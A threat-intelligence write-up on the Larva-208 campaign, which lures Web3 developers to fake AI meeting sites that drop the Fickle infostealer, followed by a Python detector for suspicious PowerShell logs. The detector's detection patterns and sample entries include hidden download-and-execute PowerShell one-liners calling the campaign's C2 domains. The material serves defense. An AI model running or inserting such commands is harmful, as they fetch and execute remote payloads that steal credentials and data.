The threat actor group Larva-208 is well known for its phishing and social engineering attacks against English-speaking IT staff, and is now targeting Web3 developers.
Using spearphishing links (T1566.002), the group lures victims with a fabricated job or portfolio request and directs them to a fake AI workspace platform.
These deceptive sites, such as the domain norlax.ai (T1583.001), mimic legitimate services like TeamPilot.ai to build credibility.

Phishing targets Web3 developers
Once engaged, victims receive unique invitation codes and emails leading to a simulated meeting environment in which audio issues prompt them to download malware disguised as Realtek HD audio drivers (T1036.005).
Running this malicious file triggers an embedded PowerShell command (T1059.001) that connects to a Command and Control (C2) server (T1583.004) to retrieve and deploy the Fickle infostealer.
This malware systematically collects sensitive data, such as device names, hardware specifications, OS versions, IP addresses, installed programs, running processes and geolocation, as well as user credentials, and sends it back to the attacker's infrastructure (T1041).
Larva-208 acquires its phishing and C2 domains through FFV2's bulletproof hosting services, which are often shared with the Bright Mantis group, leading to overlapping attribution within the cybersecurity community.
The campaign's ingenuity lies in two main infection vectors. First, the attacker distributes meeting links on social platforms such as X (formerly Twitter) and Telegram, framing them as interview opportunities for developers interested in blockchain and Web3 topics.
The second exploits job applications on recruitment platforms such as remote3.co for crypto analyst roles. Here, an initial legitimate Google Meet session is used to share the malicious Norlax AI links via chat, sidestepping the platform's warnings for suspicious downloads.

During the fake call, the victim encounters an engineered audio driver error prompting a download from the audiorealtek.com/getfile.php endpoint.
The installer covertly runs PowerShell from setup.dll (T1204.002) while displaying a benign interface, and retrieves Fickle from a C2 domain such as CJHSBAM.com.
Tactical evolution
This operation marks an evolution from Larva-208's previous method, which tricked victims into downloading .lnk files disguised as legitimate Windows script files (such as manage-bde.wsf) that carried hidden PowerShell commands using the ampersand operator to download payloads from servers like bitacid.net.
Currently, data exfiltration leverages text storage sites such as FileBin (T1567.003) for record-keeping, and key victim details (OS, username, IP, geolocation and antivirus information) are sent to notify.php on the C2 server over web protocols (T1071.001).
According to the Catalyst report, in advanced setups the collected intelligence is uploaded to an actor-controlled SilentPrism server for real-time monitoring.
The campaign highlights Larva-208's adaptation to new trends, weaponizing AI tools and exploiting Web3 developers' trust in collaborative platforms.
By harvesting cryptocurrency wallets, development credentials and project data, the group moves from ransomware-centric monetization to reselling data on illicit markets.
This exposes a vulnerability in high-value environments where traditional defenses are losing ground against socially engineered infostealers like Fickle.
Cybersecurity experts recommend endpoint detection for PowerShell anomalies, verifying domain legitimacy, and avoiding unsolicited downloads to mitigate such threats.
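As an added illustration of the PowerShell-anomaly detection recommended above (example code, not from the report or the researchers), this Python script scores constructed script-block log entries against the behaviours described: download cradles, hidden launch flags, the call-operator pattern, and the domains named in the report used as a watchlist.

```python
import re
from typing import Dict, List

# Watchlist built from the domains named in the report (assembled for this example; feed it from your own intel).
WATCHLIST_DOMAINS = {"norlax.ai", "audiorealtek.com", "cjhsbam.com", "bitacid.net"}

# Download cradles commonly seen in PowerShell stagers.
CRADLE_RE = re.compile(r"(DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Start-BitsTransfer|\bcurl\b|\bwget\b)", re.I)
# Flags that hide the console or skip profiles/policy, typical of a stager launched behind a benign installer UI.
HIDDEN_RE = re.compile(r"(-w(indowstyle)?\s+hidden|-enc(odedcommand)?\b|-nop\b|-e(xecutionpolicy|x|p)\s+bypass)", re.I)
URL_RE = re.compile(r"https?://([\w.-]+)", re.I)
# Call operator used to run something just fetched: & 'path', & $var, & (...)
CALL_OP_RE = re.compile(r"&\s*[\(\$'\"]")

def analyze_script_block(text: str) -> List[str]:
    """Return the reasons one script-block log entry (Event ID 4104 style) looks suspicious."""
    reasons = []
    if CRADLE_RE.search(text):
        reasons.append("download cradle")
    if HIDDEN_RE.search(text):
        reasons.append("hidden/non-interactive launch flags")
    if CALL_OP_RE.search(text) and CRADLE_RE.search(text):
        reasons.append("call-operator invocation combined with download")
    for host in URL_RE.findall(text):
        if host.lower() in WATCHLIST_DOMAINS:
            reasons.append(f"watchlisted domain {host.lower()}")
    return reasons

def severity(reasons: List[str]) -> str:
    """A watchlisted domain, or two independent signals, merits an alert; one signal alone is a hunt lead."""
    if any(r.startswith("watchlisted") for r in reasons) or len(reasons) >= 2:
        return "high"
    return "low" if reasons else "none"

def scan_log(lines: List[str]) -> Dict[int, Dict[str, object]]:
    """Scan log entries; key results by 1-based line number, omitting clean lines."""
    results = {}
    for n, line in enumerate(lines, start=1):
        reasons = analyze_script_block(line)
        if reasons:
            results[n] = {"severity": severity(reasons), "reasons": reasons}
    return results

# Constructed sample entries; not real telemetry from the campaign.
SAMPLE_LOG = [
    "4104 ScriptBlockText: Get-ChildItem C:\\Users\\dev\\Projects | Measure-Object",
    "4104 ScriptBlockText: powershell -w hidden -nop -c \"IEX (New-Object Net.WebClient).DownloadString('https://cjhsbam.com/x')\"",
    "4104 ScriptBlockText: iwr https://bitacid.net/p -OutFile C:\\Temp\\r.ps1; & 'C:\\Temp\\r.ps1'",
    "4104 ScriptBlockText: Invoke-WebRequest https://update.example-internal.local/patch.msi -OutFile C:\\Temp\\patch.msi",
]

if __name__ == "__main__":
    for n, hit in scan_log(SAMPLE_LOG).items():
        print(f"line {n}: {hit['severity']} - {', '.join(hit['reasons'])}")
```

The fourth sample line shows why a cradle alone is only a hunt lead: legitimate patch tooling uses the same cmdlets, so the watchlist and flag combination is what lifts the score.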
